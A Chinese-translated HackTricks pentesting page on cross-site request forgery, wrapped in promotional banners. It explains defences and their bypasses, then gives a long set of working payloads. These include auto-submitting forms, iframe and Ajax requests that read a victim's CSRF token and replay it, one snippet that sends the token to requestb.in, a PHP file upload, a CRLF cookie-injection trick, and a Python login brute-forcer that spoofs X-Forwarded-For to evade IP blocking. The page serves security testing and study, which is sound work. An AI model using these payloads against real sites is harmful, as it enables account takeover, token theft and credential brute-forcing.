hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

24 KiB
Raw Blame History

CSRF跨站请求伪造

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

加入HackenProof Discord服务器,与经验丰富的黑客和赏金猎人交流!

黑客见解
参与深入探讨黑客的刺激和挑战的内容

实时黑客新闻
通过实时新闻和见解及时了解快节奏的黑客世界

最新公告
随时了解最新的赏金计划发布和重要平台更新

加入我们的 Discord 并开始与顶尖黑客合作!

解释跨站请求伪造CSRF

**跨站请求伪造CSRF**是一种在Web应用程序中发现的安全漏洞类型。它使攻击者能够利用受害者的已验证会话代表毫不知情的用户执行操作。当已登录受害者平台的用户访问恶意站点时攻击就会执行。然后该站点通过执行JavaScript、提交表单或获取图像等方法触发对受害者帐户的请求。

CSRF攻击的先决条件

要利用CSRF漏洞必须满足几个条件

  1. 识别有价值的操作:攻击者需要找到值得利用的操作,例如更改用户的密码、电子邮件或提升权限。
  2. 会话管理用户的会话应仅通过Cookie或HTTP基本身份验证标头进行管理因为其他标头无法用于此目的进行操纵。
  3. 无法预测的参数:请求不应包含无法预测的参数,因为它们可能会阻止攻击。

快速检查

您可以在Burp中捕获请求并检查CSRF保护并在浏览器中测试时可以单击复制为fetch并检查请求:

防御CSRF攻击

可以实施多种对抗措施来防范CSRF攻击

  • SameSite cookies此属性可防止浏览器随跨站请求发送Cookie。了解更多关于SameSite cookies的信息
  • 跨域资源共享受害站点的CORS策略可能影响攻击的可行性特别是如果攻击需要读取受害站点的响应。了解有关CORS绕过的信息
  • 用户验证:提示用户输入密码或解决验证码可以确认用户的意图。
  • 检查引用者或来源标头验证这些标头可以帮助确保请求来自受信任的来源。但是精心构造URL可能会绕过实施不良的检查例如
    • 使用http://mal.net?orig=http://example.comURL以受信任的URL结尾
    • 使用http://example.com.mal.netURL以受信任的URL开头
  • 修改参数名称更改POST或GET请求中的参数名称可以帮助防止自动化攻击。
  • CSRF令牌在每个会话中加入唯一的CSRF令牌并要求在后续请求中使用此令牌可以显著减轻CSRF的风险。通过强制执行CORS可以增强令牌的有效性。

理解并实施这些防御措施对于维护Web应用程序的安全性和完整性至关重要。

防御绕过

从POST到GET

也许您想要滥用的表单准备发送带有CSRF令牌的POST请求,但是,您应该检查是否GET也是有效的以及当您发送GET请求时CSRF令牌是否仍在验证

缺少令牌

应用程序可能会实施一种机制,在出现令牌时验证令牌。但是,如果在令牌不存在时完全跳过验证,则会出现漏洞。攻击者可以通过删除携带令牌的参数而不仅仅是其值来利用这一点。这使他们可以规避验证过程并有效地执行跨站请求伪造CSRF攻击。

CSRF令牌未绑定到用户会话

未将CSRF令牌绑定到用户会话的应用程序存在重大安全风险。这些系统会根据全局池验证令牌,而不是确保每个令牌与发起会话绑定。

以下是攻击者如何利用这一点的方法:

  1. 使用自己的帐户进行身份验证
  2. 从全局池中获取有效的CSRF令牌
  3. 使用此令牌对受害者进行CSRF攻击

此漏洞允许攻击者代表受害者进行未经授权的请求,利用应用程序的不足的令牌验证机制

方法绕过

如果请求使用了一个“奇怪”的方法,请检查方法****覆盖功能是否有效。例如,如果使用了PUT方法,您可以尝试使用POST方法并发送:https://example.com/my/dear/api/val/num?_method=PUT

这也可以通过在POST请求中发送**_method参数或使用以下标头**来实现:

  • X-HTTP-Method
  • X-HTTP-Method-Override
  • X-Method-Override

自定义标头令牌绕过

如果请求在请求中添加了一个带有令牌自定义标头作为CSRF保护方法,那么:

  • 在没有自定义令牌和标头的情况下测试请求。
  • 使用完全相同长度但不同令牌测试请求。

通过Cookie验证CSRF令牌

应用程序可能通过在Cookie和请求参数中复制令牌或设置CSRF Cookie并验证后端发送的令牌来实现CSRF保护。应用程序通过检查请求参数中的令牌是否与Cookie中的值对齐来验证请求。

但是如果网站存在漏洞允许攻击者在受害者的浏览器中设置CSRF Cookie例如CRLF漏洞那么此方法容易受到CSRF攻击。攻击者可以通过加载设置Cookie的欺骗性图像然后发起CSRF攻击来利用这一点。

以下是攻击可能构建的示例:

<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>

{% hint style="info" %} 请注意,如果csrf令牌与会话cookie相关联则此攻击将无效,因为您将需要向受害者设置您的会话,因此您将攻击自己。 {% endhint %}

更改内容类型

根据此处,为了避免预检请求使用POST方法这些是允许的Content-Type值

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

但是,请注意,服务器逻辑可能会有所不同取决于使用的Content-Type,因此您应该尝试提到的值和其他值,如**application/json_,_text/xmlapplication/xml**.

发送JSON数据作为text/plain的示例来自此处

<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>

绕过预检请求以获取JSON数据

在尝试通过POST请求发送JSON数据时在HTML表单中使用 Content-Type: application/json 是不直接可能的。同样,利用 XMLHttpRequest 发送此内容类型会启动一个预检请求。尽管如此仍然有策略可以潜在地绕过这种限制并检查服务器是否处理JSON数据而不考虑Content-Type

  1. 使用替代内容类型:通过在表单中设置 enctype="text/plain",使用 Content-Type: text/plainContent-Type: application/x-www-form-urlencoded。这种方法测试后端是否使用数据而不考虑Content-Type。
  2. 修改内容类型为了避免预检请求同时确保服务器将内容识别为JSON您可以使用 Content-Type: text/plain; application/json 发送数据。这不会触发预检请求,但如果服务器配置为接受 application/json,则可能会被正确处理。
  3. SWF Flash文件利用一种较不常见但可行的方法涉及使用SWF Flash文件来绕过此类限制。要深入了解此技术请参考此文章

绕过引用者/来源检查

避免引用者头部

应用程序可能仅在存在时验证 'Referer' 头部。为了防止浏览器发送此头部可以使用以下HTML meta标签

<meta name="referrer" content="never">

这样可以确保省略“Referer”标头从而可能绕过某些应用程序中的验证检查。

正则表达式绕过

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

要在URL中设置服务器的域名以便Referrer将其发送到参数内您可以执行

<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>

HEAD方法绕过

这篇CTF解密的第一部分解释了Oak的源代码,一个路由器被设置为将HEAD请求处理为GET请求,且不返回响应体 - 这是一个常见的解决方法不仅仅适用于Oak。与处理HEAD请求的特定处理程序不同它们只是交给GET处理程序但应用程序会删除响应体

因此如果GET请求受限您可以发送一个将被处理为GET请求的HEAD请求

利用示例

窃取CSRF令牌

如果正在使用CSRF令牌作为防御,您可以尝试通过XSS漏洞或悬挂标记漏洞窃取它

使用HTML标签进行GET请求

<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available

其他可以用来自动发送GET请求的HTML5标签有

<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">

表单GET请求

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

表单POST请求

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>

通过 iframe 发送表单 POST 请求

<!--
The request is sent through the iframe withuot reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Ajax POST 请求

<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>

multipart/form-data POST 请求

myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});

multipart/form-data POST 请求 v2

// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
//  MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

//xhr.send(body);
xhr.sendAsBinary(body);

从iframe内部发起表单POST请求

<--! expl.html -->

<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>

窃取 CSRF 令牌并发送 POST 请求

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}

xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();

窃取 CSRF 令牌并使用 iframe、表单和 Ajax 发送 Post 请求

<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>

<script type="text/javascript">
function f1(){
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;

document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>

窃取 CSRF 令牌并使用 iframe 和表单发送 POST 请求

<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>

窃取令牌并使用2个iframe发送

<script>
var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>

通过Ajax窃取CSRF令牌并使用表单发送POST请求

<body onload="getData()">

<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>

<script>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>

使用 Socket.IO 进行 CSRF

<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>

CSRF登录暴力破解

该代码可用于使用CSRF令牌对登录表单进行暴力破解还使用了头部X-Forwarded-For尝试绕过可能的IP黑名单

import request
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie

def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True

with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())

工具

参考资料

加入 HackenProof Discord 服务器,与经验丰富的黑客和赏金猎人交流!

黑客见解
参与深入探讨黑客活动的刺激和挑战的内容

实时黑客新闻
通过实时新闻和见解了解快节奏的黑客世界

最新公告
了解最新的赏金任务发布和重要平台更新

加入我们的 Discord,立即与顶尖黑客合作!

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持 HackTricks 的其他方式: